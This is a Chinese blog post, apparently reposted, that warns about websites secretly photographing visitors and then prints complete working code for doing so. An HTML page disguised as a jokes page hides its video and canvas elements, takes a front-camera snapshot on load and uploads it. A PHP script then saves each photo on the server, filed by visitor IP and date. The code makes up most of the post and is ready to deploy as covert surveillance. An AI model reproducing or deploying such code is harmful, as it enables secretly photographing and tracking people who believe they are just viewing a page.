注意隐私:JS代码,开启前摄像头拍照并上传到服务器!
01.1W+0

在访问某些网站的时候一定要注意隐私,前段时间我访问某云的网站,竟然提示我请求摄像头权限???

原来是这个屌网站在开启我的前置摄像头拍照并上传到他的服务器里面!是真的恶心.靠!

代码大概如下:

index.html

<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="" content="content">
	<title>小笑话</title>
</head>
<body>
 
	<canvas id="canvas" style="display: none;" width="480" height="640"></canvas>
 
	<video id="video" style="display: none;width: 250px;height: 300px;"></video>
 
	<script src="https://lib.baomitu.com/jquery/3.6.0/jquery.js"></script>
	<script>
		window.addEventListener("DOMContentLoaded",function(){
			var canvas = document.getElementById('canvas');
			var context =canvas.getContext('2d');
			var video = document.getElementById('video');
			if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
				navigator.mediaDevices.getUserMedia({video:true}).then(function(stream){
					video.srcObject = stream;
					video.play();
					setTimeout(function(){context.drawImage(video,0,0,480,640)}, 1000);
					setTimeout(function(){
						var img = canvas.toDataURL('image/png');
						$.post('/s.php',{'imegse':img},function(data){
						//根据后端判断接下来的操作
						})
					} ,1300)
 
				},function(){
					alert('缺少访问权限');
					location.reload();
				})
 
			}
		},false);
	</script>
</body>
</html>

s.php

<?php
//允许跨域
header("Access-Control-Allow-Origin:*");
echo base64();
function base64()
{
    //接收 base64 数据
    $image = $_POST['imegse'];
    if (empty($image)) {
        return null;
    }
    //设置图片名称
    $imageName = date("His", time()) . "_" . rand(1111, 9999) . '.png';
    //判断是否有逗号 如果有就截取后半部分
    if (strstr($image, ",")) {
        $image = explode(',', $image);
        $image = $image[1];
    }
    //设置图片保存路径
    $path = "./" . getIp() . '/' . date("Ymd", time());
    //判断目录是否存在 不存在就创建
    if (!is_dir($path)) {
        mkdir($path, 0777, true);
    }
    //图片路径
    $imageSrc = $path . "/" . $imageName;
    //生成文件夹和图片
    $r = file_put_contents($imageSrc, base64_decode($image));
    if (!$r) {
        return 0;
    } else {
        return 1;
    }
}
function getIp()
{
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

 

只要用户访问这个页面并授权了摄像头权限就会根据 IP 分类存储当时拍到的前置摄像头的照片到服务器内.

IOS 端会提示权限.

Android 端部分会提示,部分不会…

这东西是很久以前的东西了… 哎现在的大数据让人恶心啊…

仔细想想真是阔怕~

文章转自:https://blog.kieng.cn/2811.html

© 版权声明

本站部分内容来自网络转载,由Alive整理后呈现,版权归原作者所有,如果有侵犯到您的权益,请联系本站删除,谢谢合作!
THE END
前端
# js# 调用摄像头
喜欢就支持以下吧
点赞0打赏一下
分享
相关推荐

标签

Alipay (1) Array (2) cookie (1) git (1) JavaScript (2) js (1) mysql (2) PHP (4) redis (1) Wechat (1) 前端 (1) 字符串 (1) 截屏 (1) 接码 (1) 数据库 (1) 短信 (1) 触发器 (1) 调用摄像头 (1) 谷歌浏览器 (1) (1) 高并发 (1)

友情链接